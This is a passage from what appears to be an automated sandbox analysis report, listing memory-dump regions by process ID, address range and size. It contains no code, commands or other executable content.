                                                                                                                      • memory/4628-88-0x0000000003420000-0x0000000003464000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        272KB

                                                                                                                      • memory/4628-61-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4628-64-0x00000000009E0000-0x00000000009ED000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        52KB

                                                                                                                      • memory/4668-738-0x0000000003771000-0x0000000003778000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                      • memory/4668-736-0x0000000002171000-0x0000000002175000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        16KB

                                                                                                                      • memory/4668-737-0x00000000037B1000-0x00000000037DC000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/4668-741-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4680-204-0x0000000004890000-0x0000000004891000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4680-203-0x0000000004890000-0x0000000004891000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4692-326-0x0000000003FF0000-0x0000000003FF1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4692-282-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4712-104-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4712-125-0x0000000000800000-0x0000000000801000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4736-80-0x0000000001610000-0x0000000001612000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4736-73-0x00007FF9066F0000-0x00007FF907090000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        9.6MB

                                                                                                                      • memory/4736-71-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4744-256-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4776-108-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4784-109-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4832-79-0x00007FF9066F0000-0x00007FF907090000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        9.6MB

                                                                                                                      • memory/4832-81-0x00000000003F0000-0x00000000003F2000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4832-76-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4840-283-0x00000000039B0000-0x00000000039B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4840-285-0x00000000039B0000-0x000000000420D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8.4MB

                                                                                                                      • memory/4840-286-0x0000000000400000-0x0000000000C77000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8.5MB

                                                                                                                      • memory/4840-284-0x0000000000400000-0x0000000000C77000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8.5MB

                                                                                                                      • memory/4868-162-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4904-82-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4904-90-0x0000000002F20000-0x0000000002F21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4904-96-0x0000000002BD0000-0x0000000002C15000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        276KB

                                                                                                                      • memory/4916-120-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4916-139-0x0000000000401000-0x0000000000417000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        88KB

                                                                                                                      • memory/4924-85-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4924-89-0x0000000003090000-0x0000000003091000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4924-94-0x0000000002FA0000-0x0000000003031000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        580KB

                                                                                                                      • memory/4924-95-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        584KB

                                                                                                                      • memory/4952-288-0x0000000000400000-0x00000000015D7000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        17.8MB

                                                                                                                      • memory/4952-287-0x0000000001C30000-0x0000000001C31000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4952-289-0x0000000001C20000-0x0000000001C21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/4972-735-0x00007FF9066F0000-0x00007FF907090000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        9.6MB

                                                                                                                      • memory/4972-739-0x0000000002540000-0x0000000002542000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/4980-157-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/4980-161-0x00000000006D0000-0x00000000006D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5004-91-0x0000000000400000-0x0000000000449000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        292KB

                                                                                                                      • memory/5004-92-0x0000000000401480-mapping.dmp
                                                                                                                      • memory/5004-97-0x0000000000400000-0x0000000000449000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        292KB

                                                                                                                      • memory/5060-164-0x0000000004C31000-0x0000000004C3D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        48KB

                                                                                                                      • memory/5060-128-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5060-163-0x00000000049A1000-0x00000000049A9000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                      • memory/5060-133-0x0000000000670000-0x0000000000671000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5060-166-0x0000000004990000-0x0000000004991000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5060-144-0x00000000029B1000-0x0000000002B96000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.9MB

                                                                                                                      • memory/5060-165-0x00000000022A0000-0x00000000022A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5064-127-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5064-136-0x00000000006A0000-0x00000000006A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5100-745-0x0000000002630000-0x0000000002632000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/5100-743-0x00007FF9066F0000-0x00007FF907090000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        9.6MB

                                                                                                                      • memory/5164-249-0x0000000003070000-0x0000000003071000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5164-254-0x0000000002E80000-0x0000000002EC5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        276KB

                                                                                                                      • memory/5164-248-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5172-330-0x0000000000400000-0x0000000000897000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4.6MB

                                                                                                                      • memory/5176-237-0x0000000009C40000-0x0000000009C41000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-189-0x0000000007A80000-0x0000000007A81000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-191-0x0000000007B20000-0x0000000007B21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-184-0x00000000076A2000-0x00000000076A3000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-183-0x00000000076A0000-0x00000000076A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-196-0x0000000008410000-0x0000000008411000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-193-0x0000000007B90000-0x0000000007B91000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-177-0x0000000007CE0000-0x0000000007CE1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-176-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-202-0x0000000008A10000-0x0000000008A11000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-174-0x000000006ECF0000-0x000000006F3DE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/5176-201-0x0000000008840000-0x0000000008841000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-208-0x0000000008B80000-0x0000000008B81000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-229-0x0000000009B00000-0x0000000009B33000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        204KB

                                                                                                                      • memory/5176-236-0x0000000009AE0000-0x0000000009AE1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-239-0x00000000076A3000-0x00000000076A4000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-238-0x000000007F020000-0x000000007F021000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-169-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5176-240-0x0000000009E00000-0x0000000009E01000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-243-0x0000000008CC0000-0x0000000008CC1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5176-245-0x0000000008C70000-0x0000000008C71000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5224-320-0x0000000034741000-0x000000003477F000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        248KB

                                                                                                                      • memory/5224-318-0x0000000033C61000-0x0000000033DE0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.5MB

                                                                                                                      • memory/5224-319-0x00000000345E1000-0x00000000346CA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        932KB

                                                                                                                      • memory/5224-307-0x0000000001830000-0x0000000001831000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5224-308-0x0000000000400000-0x00000000015D7000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        17.8MB

                                                                                                                      • memory/5224-310-0x0000000001820000-0x0000000001821000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5252-170-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5264-171-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5292-749-0x0000000002E30000-0x0000000002E31000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5320-280-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5336-758-0x0000000000730000-0x0000000000731000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5340-172-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5348-770-0x0000000002F10000-0x0000000002F11000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5388-173-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5416-257-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5436-175-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5492-748-0x0000000003030000-0x0000000003031000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5492-752-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        584KB

                                                                                                                      • memory/5496-252-0x0000000000401480-mapping.dmp
                                                                                                                      • memory/5496-251-0x0000000000400000-0x0000000000449000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        292KB

                                                                                                                      • memory/5496-255-0x0000000000400000-0x0000000000449000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        292KB

                                                                                                                      • memory/5508-178-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5520-179-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5588-182-0x00000186BCC10000-0x00000186BCC24000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        80KB

                                                                                                                      • memory/5588-181-0x00000001402CA898-mapping.dmp
                                                                                                                      • memory/5588-241-0x00000186BCC50000-0x00000186BCC70000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/5588-211-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.0MB

                                                                                                                      • memory/5588-180-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.0MB

                                                                                                                      • memory/5588-185-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        7.0MB

                                                                                                                      • memory/5588-325-0x00000186BCC70000-0x00000186BCC90000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/5716-194-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        3.5MB

                                                                                                                      • memory/5716-187-0x00000001401FBC30-mapping.dmp
                                                                                                                      • memory/5716-186-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        3.5MB

                                                                                                                      • memory/5740-188-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5764-321-0x00000000038B0000-0x00000000038B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-819-0x0000000005180000-0x0000000005181000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-825-0x00000000051E0000-0x00000000051E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-832-0x0000000005250000-0x0000000005251000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-812-0x0000000003A61000-0x0000000003A8C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/5912-814-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-815-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-817-0x0000000005160000-0x0000000005161000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-818-0x0000000005170000-0x0000000005171000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-816-0x0000000005150000-0x0000000005151000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-831-0x0000000005240000-0x0000000005241000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-820-0x0000000005190000-0x0000000005191000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-821-0x00000000051A0000-0x00000000051A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-822-0x00000000051B0000-0x00000000051B1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-823-0x00000000051C0000-0x00000000051C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-824-0x00000000051D0000-0x00000000051D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-830-0x0000000005230000-0x0000000005231000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-826-0x00000000051F0000-0x00000000051F1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-828-0x0000000005210000-0x0000000005211000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-827-0x0000000005200000-0x0000000005201000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5912-829-0x0000000005220000-0x0000000005221000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5920-195-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5944-247-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5988-791-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/6000-198-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6000-216-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/6000-227-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/6000-207-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/6012-747-0x0000000000400000-0x0000000000444000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        272KB

                                                                                                                      • memory/6012-746-0x0000000000F00000-0x0000000000F0D000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        52KB

                                                                                                                      • memory/6052-199-0x0000000000000000-mapping.dmp